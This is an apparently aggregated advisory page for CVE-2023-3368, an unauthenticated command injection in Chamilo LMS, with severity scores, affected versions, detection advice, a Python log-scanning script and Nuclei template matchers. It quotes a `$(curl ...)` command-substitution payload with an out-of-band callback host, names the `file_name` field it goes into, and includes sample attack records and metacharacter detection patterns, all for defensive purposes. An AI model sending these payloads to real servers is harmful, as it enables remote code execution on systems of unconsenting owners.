CVE-2023-3368
Published 2023-11-28
CVE-2023-3368: Command injection in `/main/webservices/additional_webservices.php` in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain remote code execution…
Priority P1 · 90 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 68.90% (99.3rd percentile)
Command injection in `/main/webservices/additional_webservices.php` in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain remote code execution via improper neutralisation of special characters. This is a bypass of CVE-2023-34960.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| chamilo | chamilo | < 1.11.20 | 1.11.20 |
| chamilo | chamilo | <= 1.11.20 | — |
Detection & IOCs (extracted from sources)
| Type | Indicator |
|---|---|
| command | `$(curl http://{{interactsh-url}}/)` |
| other | `wsConvertPptResponse` |
- The vulnerable endpoint is unauthenticated. Monitor for POST requests to `/main/webservices/additional_webservices.php` from unauthenticated sessions, especially those carrying shell metacharacters (e.g. `$()`, backticks, semicolons) in the `file_name` parameter.
- Exploitation uses the SOAP/web-service parameter `file_name` within a `wsConvertPpt` request (the PPT-to-LP conversion service). Treat an HTTP response whose body contains `wsConvertPptResponse` as confirmation that a request reached this service, and correlate it with the suspicious request that produced it.
- The PoC payload injects a `$(curl ...)` command substitution into the `file_name` field alongside `service_ppt2lp_size` set to `720x540`. Alert on any `file_name` value containing `$(`, backtick command substitution, or other shell metacharacters in requests to this endpoint.
- This CVE is an explicit bypass of CVE-2023-34960; mitigations put in place for CVE-2023-34960 may therefore be insufficient. Ensure detection rules cover both CVEs on the same endpoint.
- The Nuclei template uses an out-of-band (interactsh) callback to confirm exploitation. In environments where outbound HTTP is blocked, the `$(curl ...)` payload will not produce a detectable callback; use alternative OOB channels or in-band detection (e.g. response timing, error messages) instead.
- The vulnerability affects Chamilo LMS versions up to and including v1.11.20. Instances running versions beyond this threshold are not affected by this specific bypass.
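Detection logic for the indicators above, as an added example that is neither part of this record nor Chamilo's or the Nuclei project's code. It assumes request records already parsed from a reverse proxy or WAF that logs POST bodies and response bodies (a constructed schema with the keys `src`, `method`, `path`, `authenticated`, `form`, `status` and `response_body`); the sample records are constructed here, including the interactsh-style payload quoted on the page, and the rules implement both the request-side metacharacter check and the in-band `wsConvertPptResponse` confirmation:

```python
"""Flag requests to Chamilo's additional_webservices.php that carry shell
metacharacters in `file_name` (CVE-2023-3368 / CVE-2023-34960 pattern).
Added example: not part of the advisory, Chamilo or the Nuclei template."""
import re
from typing import Iterable, Optional

VULN_PATH = "/main/webservices/additional_webservices.php"

# Shell metacharacters that have no business in a file name sent to this
# endpoint: command substitution, pipes, separators, redirects, newlines.
SHELL_META = re.compile(r"\$\(|\$\{|`|[;|&<>\n\r]")

# Shape of the OOB payload listed on the page: command substitution that
# invokes an HTTP client to reach a callback host.
CALLBACK_PAYLOAD = re.compile(r"\$\(\s*(curl|wget)\b", re.IGNORECASE)

# SOAP element that confirms the wsConvertPpt service answered the request.
RESPONSE_MARKER = "wsConvertPptResponse"


def has_shell_metachars(value: str) -> bool:
    """True if `value` contains any of the metacharacters in SHELL_META."""
    return SHELL_META.search(value) is not None


def assess_request(req: dict) -> Optional[dict]:
    """Return an alert for one request record, or None if it looks benign.

    The record schema (src, method, path, authenticated, form, status,
    response_body) is an assumption of this example, not a real log format.
    """
    if req.get("method") != "POST" or req.get("path") != VULN_PATH:
        return None
    file_name = req.get("form", {}).get("file_name", "")
    reasons = []
    if has_shell_metachars(file_name):
        reasons.append("shell metacharacters in file_name")
    if CALLBACK_PAYLOAD.search(file_name):
        reasons.append("command substitution invoking an HTTP client (OOB callback pattern)")
    if not reasons:
        return None
    # In-band confirmation: a 200 whose body carries the SOAP response element
    # means the request reached the converter, independent of any OOB callback.
    confirmed = req.get("status") == 200 and RESPONSE_MARKER in req.get("response_body", "")
    return {
        "src": req.get("src"),
        "authenticated": bool(req.get("authenticated", False)),
        "file_name": file_name,
        "reasons": reasons,
        "confirmed": confirmed,
        "severity": "critical" if confirmed else "high",
    }


def scan(requests: Iterable[dict]) -> list:
    """Run assess_request over a sequence of records and keep the alerts."""
    return [alert for alert in (assess_request(r) for r in requests) if alert]


# Constructed sample records: one legitimate conversion, one request matching
# the page's PoC shape, one backtick variant that errored out, one unrelated GET.
SAMPLE_REQUESTS = [
    {"src": "10.0.0.5", "method": "POST", "path": VULN_PATH, "authenticated": True,
     "form": {"file_name": "lecture1.ppt", "service_ppt2lp_size": "720x540"},
     "status": 200, "response_body": "<wsConvertPptResponse>ok</wsConvertPptResponse>"},
    {"src": "198.51.100.7", "method": "POST", "path": VULN_PATH, "authenticated": False,
     "form": {"file_name": "$(curl http://oob.example.invalid/)", "service_ppt2lp_size": "720x540"},
     "status": 200, "response_body": "<wsConvertPptResponse></wsConvertPptResponse>"},
    {"src": "198.51.100.8", "method": "POST", "path": VULN_PATH, "authenticated": False,
     "form": {"file_name": "`id`.ppt"}, "status": 500, "response_body": "SOAP-ENV:Server"},
    {"src": "10.0.0.9", "method": "GET", "path": "/main/inc/lib/javascript/jquery.js",
     "authenticated": False, "form": {}, "status": 200, "response_body": ""},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_REQUESTS):
        print(alert["severity"], alert["src"], alert["file_name"], alert["reasons"])
```

Because the metacharacter check runs on the request and the `wsConvertPptResponse` check on the response, the unauthenticated PoC-shaped request is raised as `critical` (reached the converter) while the errored backtick variant is still raised as `high`, which matches the page's advice to keep in-band detection even when outbound HTTP is blocked.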
CVSS provenance
- nvd (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- vulncheck: 9.8 CRITICAL
GHSA
GHSA-x9xc-jg9p-2j7f · ghsa_unreviewed · 2023-11-28 · CVSS 9.8 CRITICAL · CWE-78: Command injection in `/main/webservices/additional_webservices.php`
VulnCheck
CVE-2023-3368 · vulncheck · 2023 · CVSS 9.8 CRITICAL: chamilo chamilo, Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Affected: chamilo chamilo
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://media.defense.gov/2024/Sep/18/2003547016/-1/-1/0/CSA-PRC-LINKED-ACTORS-BOTNET.PDF; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2023-3368&date=2025-10-31; https://api.vulncheck.com/v3/index/vulncheck-canaries?c
No detection rules found.
Nuclei
CVE-2023-3368 · nuclei · CVSS 9.8 CRITICAL: Chamilo LMS <= v1.11.20 Unauthenticated Command Injection
Values extracted from the template: `Chamilo LMS`, `file_data`, `file_name` = `$(curl http://{{interactsh-url}}/)`, `service_ppt2lp_size` = `720x540`.
Matchers section of the template:
```yaml
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "wsConvertPptResponse"
        part: body
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a004730450221008f2ffd726769c8f7d9c324ccc248b6b8aed9185b2989dc32a0ad53d39a7d2cc8022077b671f1c2d8806f9ebb0c69ba4449d1fc8bff9d1d85dca290c6b46799beb865:922c64590222798bb761d5b6d8e72950
```
No writeups or analysis indexed.
References
- https://github.com/chamilo/chamilo-lms/commit/37be9ce7243a30259047dd4517c48ff8b21d657a
- https://github.com/chamilo/chamilo-lms/commit/4c69b294f927db62092e01b70ac9bd6e32d5b48b
- https://starlabs.sg/advisories/23/23-3368/
- https://support.chamilo.org/projects/chamilo-18/wiki/security_issues#Issue-121-2023-07-05-Critical-impact-High-risk-Unauthenticated-Command-Injection-CVE-2023-3368